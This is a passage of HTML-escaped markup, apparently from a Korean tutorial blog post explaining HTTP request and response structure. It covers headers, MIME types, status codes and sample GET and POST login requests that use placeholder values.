&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;기본적으로&amp;nbsp;캐싱&amp;nbsp;가능. &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;기본적으로&amp;nbsp;캐싱되지&amp;nbsp;않음.&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;북마크&amp;nbsp;가능성 &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;URL에&amp;nbsp;데이터가&amp;nbsp;포함되어&amp;nbsp;있으므로&amp;nbsp;가능. &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;본문&amp;nbsp;데이터를&amp;nbsp;전송하므로&amp;nbsp;불가능.&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 71px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 71px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;반복 요청 처리&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #dddddd;&quot;&gt;&lt;i&gt;&lt;span style=&quot;background-color: #424242; text-align: start;&quot;&gt;*** Idempotent(멱등성): 동일 요청 여러 번 보내도 동일한 결과. &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 71px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;멱등성 보장&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 71px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;멱등성이&amp;nbsp;보장되지&amp;nbsp;않을&amp;nbsp;수&amp;nbsp;있음.&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;속도 &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;상대적으로&amp;nbsp;빠름. &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;상대적으로&amp;nbsp;느림.&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2) 헤더(Header)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;요청의 추가 정보를 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; Host:&lt;/b&gt; 응답을 요청하는 호스트&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; User-Agent:&lt;/b&gt; 응답 내용에 대해 응답할 수 있는 브라우저의 종류&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Accept:&lt;/b&gt; 클라이언트가 처리 가능한 콘텐츠 유형을 서버에 알림&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Accept-Encoding :&lt;/b&gt; 클라이언트가 지원하는 압축 방식을 지정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Accept-Language:&lt;/b&gt; 응답에 대해 선호하는 언어&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Authorization :&lt;/b&gt; 서버에 인증 정보를 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Cookie:&lt;/b&gt; 클라이언트가 서버에 쿠키 데이터를 전달&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; Referer:&lt;/b&gt; 요청을 보낸 이전 페이지의 URL&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Type :&lt;/b&gt; 요청 본문의 MIME 타입을 지정&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;MIME은 클라이언트와 서버 간 데이터의 콘텐츠 유형을 지정하는데 사용됩니다. HTTP 요청 또는 응답의 Content-type 헤더를 통해 MIME의 타입이 전달된다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;[MIME 타입의 구조]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;type&lt;/span&gt;/&lt;span style=&quot;color: #ee2323;&quot;&gt;subtype&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;  &lt;span style=&quot;color: #006dd7;&quot;&gt;type&lt;/span&gt; : 콘텐츠의 주요 카테고리를 나타낸다.&lt;br /&gt;  &lt;span style=&quot;color: #ee2323;&quot;&gt;subtype&lt;/span&gt; : 콘텐츠의 세부 유형을 나타낸다.&lt;br /&gt;&lt;br /&gt;1. &lt;span style=&quot;color: #006dd7;&quot;&gt;text/&lt;/span&gt; 텍스트 데이터와 관련된 콘텐츠&lt;br /&gt;&amp;nbsp; 예) text/plain : 일반 텍스트, text/html : HTML 문서&lt;br /&gt;2. &lt;span style=&quot;color: #006dd7;&quot;&gt;image/&lt;/span&gt; 이미지 파일&lt;br /&gt;&amp;nbsp; 예) image/png : PNG 이미지, image/jpeg : JPEG 이미지&lt;br /&gt;3. &lt;span style=&quot;color: #006dd7;&quot;&gt;audio/&lt;/span&gt; 오디오 파일&lt;br /&gt;&amp;nbsp; 예) audio/mp3 : mp3파일&lt;br /&gt;4. &lt;span style=&quot;color: #006dd7;&quot;&gt;video/&lt;/span&gt; 비디오 파일&lt;br /&gt;&amp;nbsp; 예) video/mp4 : mp4파일&lt;br /&gt;5. &lt;span style=&quot;color: #006dd7;&quot;&gt;application/&lt;/span&gt; 구조화된 데이터 또는 실행 가능한 콘텐츠&lt;br /&gt;&amp;nbsp; 예) application/json : JSON 데이터, application/xml : XML 데이터, application/zip : ZIP 압축 파일&lt;br /&gt;6. &lt;span style=&quot;color: #006dd7;&quot;&gt;multipart/&lt;/span&gt; 여러 개의 다른 MIME 타입 데이터를 포함하는 콘텐츠. 일반적으로 파일 업로드 같은 상황에서 사용된다.&lt;br /&gt;&amp;nbsp; 예) multipart/form-data : HTML 양식의 데이터, multipart/alternative : 여러 표현의 이메일 메시지&lt;br /&gt;7. &lt;span style=&quot;color: #006dd7;&quot;&gt;message/&lt;/span&gt; 메시지와 관련된 MIME 타입&lt;br /&gt;&amp;nbsp; 예) message/rfc822 : 이메일 메시지&lt;br /&gt;8. &lt;span style=&quot;color: #006dd7;&quot;&gt;font/&lt;/span&gt; 폰트 파일&lt;br /&gt;&amp;nbsp; 예) font/woff : WOF 폰트 파일&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;b&gt;Content-Length :&lt;/b&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #fcfcfc; color: #666666; text-align: left;&quot;&gt;요청 본문의 길이를 바이트 단위로 지정&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Encoding :&lt;/b&gt; 요청 본문이 압축되었음을 나타냄&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Cache-Control :&lt;/b&gt; 클라이언트 또는 서버가 요청에 대해 캐싱 동작을 지정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;If-Modified-Since :&lt;/b&gt; 지정된 날짜 이후에 변경된 리소스만 요청&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;ETag :&lt;/b&gt; 서버가 리소스의 특정 버전을 식별하는 태그&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Connection :&lt;/b&gt; 연결 유지 여부를 나타낸다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; Proxy-Connection:&lt;/b&gt; 프록시 연결을 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3) 빈줄(CRLF)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;헤더와 본문을 구분하는 빈줄(\r\n)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4) 본문(Body)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;POST, PUT 등의 Method에서 요청 데이터를 포함&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔ GET 요청 예시 :&lt;/b&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1736608222267&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;GET /login.jsp?id=test&amp;amp;password=1234 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionId=abc123; theme=light&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔ POST 요청 예시 :&lt;/b&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1736609794403&quot; class=&quot;html xml&quot; data-ke-language=&quot;html&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;POST /login.jsp HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: keep-alive
Cookie: sessionId=abc123; theme=light

id=test&amp;amp;password=1234&lt;/code&gt;&lt;/pre&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;HTTP Response 구조&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1) 상태 줄(&lt;/b&gt;&lt;b&gt;Status Line)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;HTTP 버전&lt;/span&gt; : &lt;/b&gt;사용하는 HTTP 프로토콜 버전&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;상태 코드(Status Code)&lt;/b&gt;&lt;/span&gt; : 요청 처리 결과를 나타내는 숫자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;상태 메시지(Status Message) &lt;/b&gt;&lt;/span&gt;: 상태 코드를 설명하는 텍스트 메시지&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 572px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;1xx&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;정보제공&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;100&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Continue&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청이 초기 검증을 통과했으며, 계속 진행해도 됩니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;101&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Switching Protocol&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;서버 프로토콜 변경 요청을 승인했습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;103&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Early Hints&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;캐시 사전 로딩 정보를 제공합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;2xx&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;성공&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;200&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;OK&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청이 성공적으로 처리되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;201&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Created&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청으로 인해 새로운 리소스가 생성되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;202&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Accepted&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청이 수락되었지만, 아직 처리되지 않았습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;204&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;No Content&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청은 성공했지만, 응답 본문이 없습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;206&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Partial Content&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;부분 콘텐츠 요청이 성공적으로 처리되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;3xx&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;리다이렉션&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;301&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Moved Permanently&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;리소스가 영구적으로 새로운 URL로 이동했습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;302&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Found&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;리소스가 임시적으로 다른 URL에서 제공합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;303&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;See Other&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;리소스를 다른 URL로 조회해야 합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;304&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Not Modified&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;클라이언트의 캐시된 리소스가 여전히 유효합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;307&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Temporary Redirect&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;임시적으로 다른 URl로 리다이렉션됩니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;308&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Permanent Redirect&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;영구적으로 다른 URL로 리다이렉션됩니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;4xx&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;클라이언트 오류&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 52px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 52px;&quot;&gt;400&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 52px;&quot;&gt;Bad Request&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 52px;&quot;&gt;잘못된 요청 형식으로 인해 서버가 요청을 이해하지 못했습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;401&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Unauthorized&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;인증이 필요합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 26px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;403&lt;/td&gt;
&lt;td style=&quot;width: 25%; height: 26px;&quot;&gt;Forbidden&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 26px;&quot;&gt;요청은 이해되었지만, 권한이 없어 거부되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;404&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Not Found&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;요청한 리소스를 찾을 수 없습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;405&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Method Not Allowed&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;요청 메서드가 허용되지 않습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;408&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Request Timeout&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버가 요청을 기다리다 시간 초과되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;5xx&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;서버 오류&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;500&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Internal Server Error&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버에서 알 수 없는 오류가 발생했습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;501&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Not Implemented&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버가 요청된 기능을 지원하지 않습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;502&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Bad Gateway&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버가 잘못된 게이트웨이 응답을 받았습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;503&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Service Unavailable&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버가 과부하 상태이거나 유지보수 중입니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;504&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;Gateway Timeout&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;게이트웨이 또는 프록시 서버가 응답 시간 초과되었습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;505&lt;/td&gt;
&lt;td style=&quot;width: 25%;&quot;&gt;HTTP Version Not Supported&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;서버가 요청된 HTTP 버전을 지원하지 않습니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2) 헤더(&lt;/b&gt;&lt;b&gt;Header)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;응답의 메타데이터를 포함하며, 콘텐츠 타입, 서버 정보, 캐싱 정책 등을 전달한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Data&lt;/b&gt;: 응답이 생성된 날짜와 시간&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Cache-Control :&lt;/b&gt; 캐싱 동작을 제어합니다. (예: Cache-Control: no-cache)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Connection:&lt;/b&gt;&lt;span&gt; 현재 연결을 유지할지 종료할지 설정&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Via :&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;요청에서 클라이언트와 서버, 통신 중간에 프로토콜과 수신자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Age :&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;서버에서 생성된 페이지에 대한 예상 시간&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Server:&lt;/b&gt; 응답 서버 정보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Retry-After :&lt;/b&gt; 서버가 일정 시간 후 요청을 다시 시도하라고 알림.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Accept-Ranges:&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt; 클라이언트가 요청한 리소스의 특정 범위를 지원할지 여부를 나타낸다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Etag: &lt;/b&gt;리소스의 고유 식별자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Last_Modified:&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;최근 응답 페이지 수정일&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Expires:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;내용이 만료되는 것으로 예상 시간&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Vary :&lt;/b&gt; 클라이언트의 요청 헤더에 따라 응답이 달라지는 조건을 명시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Type :&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;&lt;span&gt; 응답 데이터의 MIME 타입을 정의&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Length :&lt;/b&gt; 응답 본문의 바이트 크기&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Encoding :&lt;/b&gt; 본문 데이터가 어떤 인코딩 방식으로 압축되었는지 나타닌다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Language :&lt;/b&gt; 응답 본문에 사용된 언어를 나타냄.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Content-Disposition :&lt;/b&gt; 응답 데이터를 어떻게 처리할지 나타낸다. (예: Content-Disposition: attachment; filename=&quot;file.pdf&quot;)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Set-Cookie :&lt;/b&gt; 클라이언트에 쿠키를 설정&lt;/p&gt;
